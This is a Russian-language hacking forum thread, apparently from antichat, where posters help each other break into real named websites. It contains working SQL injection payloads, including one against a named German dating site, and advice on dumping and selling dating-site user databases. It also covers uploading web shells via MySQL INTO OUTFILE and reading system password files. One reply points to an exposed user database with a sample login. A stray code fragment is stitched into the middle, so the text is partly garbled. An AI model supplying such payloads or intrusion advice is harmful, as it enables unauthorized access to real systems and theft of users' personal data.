Если просто написать select version() то вывод есть, но если добавить from то ничего. Установил что проблема не в фильтрах т.к. целочисленные столбцы таблиц вполне-таки выводятся. Обоснованно предположил что проблема в кодировке, но не просто hex(login) ни unhex(hex(login)) не помогли, более того даже convert(login as кодировка) не помогло(протестил с 4 популярными кодировками). Последний метод вроде даже в большом мане по иньекциям на ачате не значится ввиду того что unhex(hex(login)) эффективнее.

Не совсем понимаю в чем проблема - какая-то нестандартная кодировка или изъян в научных методах

Но это мелочи, логин пасс я вывел через ord и в админку попал, тем не менее залить шелл как товар-программу не получилось: файл закачивается, делаю заказ на этот товар ставлю что товар доставлен, но на почту ссылка на него не приходит. Проверил - даже если просто изменить статус заказа и поставить галку "оповестить о изменении статуса по мылу" письмо всеравно не приходит. Походу с сайта письма не шлются.

Главный вопрос - где же теперь мой шелл лежит?

Забрал из базы скулей мыло и пароль, но они в таком виде:

email

>VР&:WмєZxw9•

password

}G©џЗи

это что за зюги еще?

Забрал из базы скулей мыло и пароль, но они в таком виде:
email
>VР&:WмєZxw9•
password
}G©џЗи
это что за зюги еще?


значит зашифрованы aes_decrypt(aes_encrypt(password,key),key)

ключик те надо искать в скриптах либо в бд....

pinch, хм, ладно, искать меньше всего хочется. выложу в паблик, мб кому и пригодится )) спасибо)))

Как я понимаю,тут админки нет?

User-agent: *

Allow: /

Disallow: /toc/

Disallow: /index/

Disallow: /templates/

Disallow: /faq/

Disallow: /action/

Disallow: /alien/

Disallow: /admin/

Sitemap: http://support.take2games.com/sitemap.xml

Sitemap: http://support.rockstargames.com/sitemap.xml

Sitemap: http://support.2kgames.com/sitemap.xml

Disallow: /admin/


http://2kgames.com/admin/ - запрашивает логин:пароль. Проверял?

DesCent said:
http://2kgames.com/admin/ - запрашивает логин:пароль. Проверял?


Не дошло-))) СПС

Подскажите плз

uname -a

Linux syd-srv01.ezyreg.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

Можно ли тут поднять права до рута?

Кто подскажет где можно почитать как от А до Я поднимать права с веб-шелла?

I love this game

Вот тебе сюда => клац (https://antichat.live/threads/235697/)

Dagger

https://www.2kgames.com/user/login посмотри мб разограничение прав есть.

А вообще ты тоже не там отписал => жмак (https://antichat.live/threads/241942/)

I love this game said:
Кто подскажет где можно почитать как от А до Я поднимать права с веб-шелла?


/thread151993-%D0%F3%F2%E0%ED%FC%E5.html

I love this game said:
Подскажите плз
uname -a
Linux syd-srv01.ezyreg.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
Можно ли тут поднять права до рута?


нет.

Где найти полный FAQ по сливу датинг баз? И возможно ли слить базу милионник не имея прав админа? Пробовал Havij но медленно сливает,может есть другая софтина подобная Havij для скули?

noviyuser said:
Делаю подзапрос
Показывает ошибку
Делаю
Показывает
Делаю
То же самое
Как это обойти? Или как нужно составить запрос? Помогите плиз


Query failed with error: Subquery returns more than 1 row

ошибка дала тебе и ответ....используй more than 1 row

Gorev said:
Query failed with error: Subquery returns more than 1 row
ошибка дала тебе и ответ....используй more than 1 row


можно примерчик? заранее спс

наоборот ты используе больше чем 1 ров, надо 1, добавиль лимит

Dagger said:
Где найти полный FAQ по сливу датинг баз? И возможно ли слить базу милионник не имея прав админа? Пробовал Havij но медленно сливает,может естьго другая софтина подобная Havij для скули?


да возможно, сливал уже через скули. Отдельный многопоточный скрипт на перле решил мою проблему. если что могу помочь пиши асю в пм.

http://www.singles-4you.de/im_show.php?rid=111-222'

не как получается её продолжить подскажите!

manerus said:
http://www.singles-4you.de/im_show.php?rid=111-222'
не как получается её продолжить подскажите!



лови

http://www.singles-4you.de/im_show.php?rid=111222'+and+'1'='1'))+or+1+group+b y+concat(version(),floor(rand(0)*2))having+min(0)+ or+1--+

осматривал сайт на sql иньекцию ничего не нашёл

в а админке набрал логин и пароль как ' выдало сообщение об mysql ошибке

кто что думает? такое может отображаться при дырке или реагирует на кавычку так?

вводя другие логины с паролем ошибки нет

Koren said:
осматривал сайт на sql иньекцию ничего не нашёл
в а админке набрал логин и пароль как ' выдало сообщение об mysql ошибке
кто что думает? такое может отображаться при дырке или реагирует на кавычку так?
вводя другие логины с паролем ошибки нет


я думаю что пошел бы ка ты читать про иньекции в пост запросе и не постил всякую дребедень

Gorev said:
я думаю что пошел бы ка ты читать про иньекции в пост запросе и не постил всякую дребедень


завязывай с милыми наездами

я знаю что это пост запрос

дело в том что ошибка только при кавычке а вот при запросе 3-1 странички все одинаковые т.к там особо то и нет ничего по чём можно определить различие страниц, поле логин и пароль

Koren said:
завязывай с милыми наездами
я знаю что это пост запрос
дело в том что ошибка только при кавычке а вот при запросе 3-1 странички все одинаковые т.к там особо то и нет ничего по чём можно определить различие страниц, поле логин и пароль


ну покажи как ты запрос делаешь постом 3-1

Немножко не по теме, извините!

Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...

cipa21 said:
Немножко не по теме, извините!
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...


http://whois.domaintools.com/inj3ct0r.com

Note: This Domain Name is Suspended.

In this status the domain name is InActive and will not function.

попугай said:
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.


Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!

делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5

но когда пытаюсь выбрать из базы:

(id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

вылазит ошибка

Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1

в чем проблема?

InferNo23

подзапрос select надо взять в скобки

SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))

Konqi said:
InferNo23
подзапрос select надо взять в скобки
SUBSTRING(
(
select+1+from+phpbb_users+limit+0,1
)
,1 ,1))=53,1,-1))



(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+ limit+0,1),1,1))=53,1,-1))

теперь

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1

Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...

http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.




" if author else f"

Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...

http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.




Вродь дернули на 1337db.com, но сайт тоже не отвечает.

Следите за ихним твиттером (http://twitter.com/inj3ct0r), возможно, объявятся еще.

InferNo23

так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.

ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?

зачем посимвольно..

http://www.tringuladating.com//db/

Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.

Dagger said:
http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.


странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки

Kusto said:
странно- там дамп БД юзерей в плейнтексте
trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone


А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?

Dagger said:
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?


тебе сколько лет дитё? распечатай на принтере все, раз дамп открыть не можешь

ЗЫ. потом маркером будешь подчеркивать, зеленым логины и красным пароли..

С запросами sql только знакомлюсь и в локалке наткнулся на

/games.html?page=phpinfo()

Фото:

http://s009.radikal.ru/i308/1012/60/eb2a481c242a.jpg

Вопрос:

Простая ошибка БД или есть возможность sql-inj?

Буду рад любым ответам,даже если пошлют в google.

http://www.site.com/default.asp?show=dologin&id=1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.1.51-community]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

/incs/menu_inc.asp, line 300

при определине рентабельности полей

http://www.site.com/default.asp?show=dologin&id=1+union+select+1,2--+

точно так же как и при

http://www.site.com/default.asp?show=dologin&id=1

но при следующих действиях пишет

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'CInt'

/incs/menu_inc.asp, line 303

подскажите что я делаю не так?

P.S. PR 7

Пробую лить мелкий шелл через добавления юзера, но при просмотре пхпинфо ничего не выводит. Нагуглил исходники двига, в начале скрипта стоит

Можно ли как-нибудь обойти это?

Lastman said:
Пробую лить мелкий шелл через добавления юзера, но при просмотре пхпинфо ничего не выводит. Нагуглил исходники двига, в начале скрипта стоит
Можно ли как-нибудь обойти это?


ты сам понял что сказал?

"Пробую лить мелкий шелл через добавления юзера"

может обясниш каким способом?

" но при просмотре пхпинфо ничего не выводит"

что должно выводить?

"Нагуглил исходники двига, в начале скрипта стоит "

какого скрипта?

Lastman said:
Пробую лить мелкий шелл через добавления юзера, но при просмотре пхпинфо ничего не выводит. Нагуглил исходники двига, в начале скрипта стоит
Можно ли как-нибудь обойти это?


я долго читал ...мелкий шелл имеешь в виду ? какой скрипт...короче относишся к категории фейспалма

имеется возмоность в mysql сделать select 'hz' into outfile '1.php' но как узнать путь ?

rootmd said:
имеется возмоность в mysql сделать
select 'hz' into outfile '1.php'
но как узнать путь ?


читай конфиги на сеpваке... хттпд.конф, ищи пхпинфо...

Не так выразился.

Konqi

Есть скрипт рассылки wr-subscribe 1.0

Добавляю в меню Создать рассылку.

Вызываю пхпинфо site.ru/allsubscribe.php?c=phpinfo(); - белая страница вылазит.

Залил на локалхост скрипт рассылки, убрал в начале скрипта - всё пашет (открывает пхпинфо).

Вот и спрашиваю можно ли как-нибудь залить шелл, когда в начале стоит

Gorev said:
читай конфиги на сеpваке... хттпд.конф, ищи пхпинфо...


вот в этом и проблема...читал /etc/shadow, /etc/my.cnf....а конфиги апача или пхп никак не могу найти.

Apache 2.2.14 (Ubuntu)

всем привет! на сайте нашол sql-inj, достал логин и хеш, хеш сдесь помогли расшифровать, но в админку не пускает. Как быть? Чё делать?

Есть любая другая возможность залить шелл через админку phpbb3 не редактируя шаблоны?

rootmd said:
вот в этом и проблема...читал /etc/shadow, /etc/my.cnf....а конфиги апача или пхп никак не могу найти.
Apache 2.2.14 (Ubuntu)


/thread49775.html


EWGhack said:
всем привет! на сайте нашол sql-inj, достал логин и хеш, хеш сдесь помогли расшифровать, но в админку не пускает. Как быть? Чё делать?


это новогодняя магия, чем может форум помочь тебя?

как варианты

это таблица юзеров а не админов

это не админка

это другая админка

это подделка

старая таблица админов, со старыми паролями

phpbb_users

Вася убери нах всю эту дребедень, есть таблички форума, заходи в админку форума и заливай шелл...

fl00der said:
Если ты читаешь shadow, зачем тебе ваще конфиги апача?
Просто крякни пасс рута.


извени, не shadow а passwd. shadow не получается.

может подскажите что еще полезного можно читать?

/etc/httpd/conf/httpd.conf

/usr/local/apache2/httpd.conf

ну короче вариации этого

да я видел....попробовал но не хочет....наверное нету права.

Привет.

Нашел sql инъекцию в одно игре, но справится с ней не могу. Игра не интересная, а вот как выполнить инъекцию стало интересно. Подскажите.

Вобщем так. По всей видимости выполняются последовательно два таких вот запроса

SELECT field1%%, field2%% from table1 where user=123 limit 1

UPDATE table1 set field1%% = ?, field2%% = 0 where user=123 limit 1

где

%% любое значение которое можно передать запросом, оно ни как не фильтруется. Значение подставляется одно и тоже во всех 4х местах

? тут должно быть какое то значение, но его нет, т.е пусто. Видимо значение высчитывается после 1 sql запроса. Или есть еще другие sql заросы.

значения в полях field числовые

Если будет ошибка в 1м sql запросе, до второго не доходит.

Без ошибок работает только когда %% равно от 1 до 5. Но сообщает типа, что у нас там чего то не хватает для выполнения действия (игровой момент).

Задача выполнить update для одного пользователя 123 и изменить значения в полях field11 (field12 ...)

zuzzz said:
Привет.
Нашел sql инъекцию в одно игре, но справится с ней не могу. Игра не интересная, а вот как выполнить инъекцию стало интересно. Подскажите.
Вобщем так. По всей видимости выполняются последовательно два таких вот запроса
SELECT field1%%, field2%% from table1 where user=123 limit 1
UPDATE table1 set field1%% = ?, field2%% = 0 where user=123 limit 1
где
%% любое значение которое можно передать запросом, оно ни как не фильтруется. Значение подставляется одно и тоже во всех 4х местах
? тут должно быть какое то значение, но его нет, т.е пусто. Видимо значение высчитывается после 1 sql запроса. Или есть еще другие sql заросы.
значения в полях field числовые
Если будет ошибка в 1м sql запросе, до второго не доходит.
Без ошибок работает только когда %% равно от 1 до 5. Но сообщает типа, что у нас там чего то не хватает для выполнения действия (игровой момент).
Задача выполнить update для одного пользователя 123 и изменить значения в полях field11 (field12 ...)


да сразу измени пароль админа через иньекцию...зачем хеш админа добывать, потом его расшифровывать...а ведь могут и не сбрутить же..тогда как похекать сайт? Улавливаешь мысль насчет апдейта? хоть подумайте перед тем как всякий бред постить...

Gorev said:
да сразу измени пароль админа через иньекцию...зачем хеш админа добывать, потом его расшифровывать...а ведь могут и не сбрутить же..тогда как похекать сайт? Улавливаешь мысль насчет апдейта? хоть подумайте перед тем как всякий бред постить...


мысль не уловил)

до апдейта дело не дойдет, если 1й селект вернёт ошибку. а строка инъукции которую я передам втавляется одновременно и в 1 селект и во 2й апдейт. Вот и не получается мне так написать, что бы и селект не ругнулся и апдейт что нибудь нужное проапдейтил.

Я хорошо подумал, перед тем как тут этот бред писать

Мне не нужен хеш админа, я про него ни слова не сказал) там и хешей то нет наверно. И цель у меня не сайт взломать, чисто спортивный интерес+ очень сомнительная вероятность подзаработать. Это не форум не портал, а простенькая браузерная игра.

Если хочешь что бы помог - пиши в асю - 4000840, постараюсь.

в phpmyadmin если есть доступк обычного юзера, можно как-то смотреть phpinfo или что-то подобное?

phpmyadmin 3.3.2deb1

да, phpinfo.php лежит в корне phpmyadmin`a

(( белая страница. неважно. нашел уже путь. а теперь проблема. у директрорий стойт 777 права но мускл юзер не может писать/читсть (((( почему? ведь /etc/passwd читает

rootmd

скинь код ошибки

когда пытаюсь читать файл - ничего. когда писать - Errcode 13

rootmd said:
когда пытаюсь читать файл - ничего. когда писать - Errcode 13


"chmod 1777" тебе спасет, но кажется у тебя нет прав на выполнение каманд в обалочке.

попробуй в другие папки...

в другие папки могу но ведь мне нужно чтоб я смог зайти на нем через веб сервер

rootmd said:
(( белая страница. неважно. нашел уже путь. а теперь проблема. у директрорий стойт 777 права но мускл юзер не может писать/читсть (((( почему? ведь /etc/passwd читает


с чего ты взял что там чмод 777 ? 13 ошибка выдает именно то что неты прав на ззапись в данную папку, файл_прив проверял у юзверя? ди унде ешть уэй ?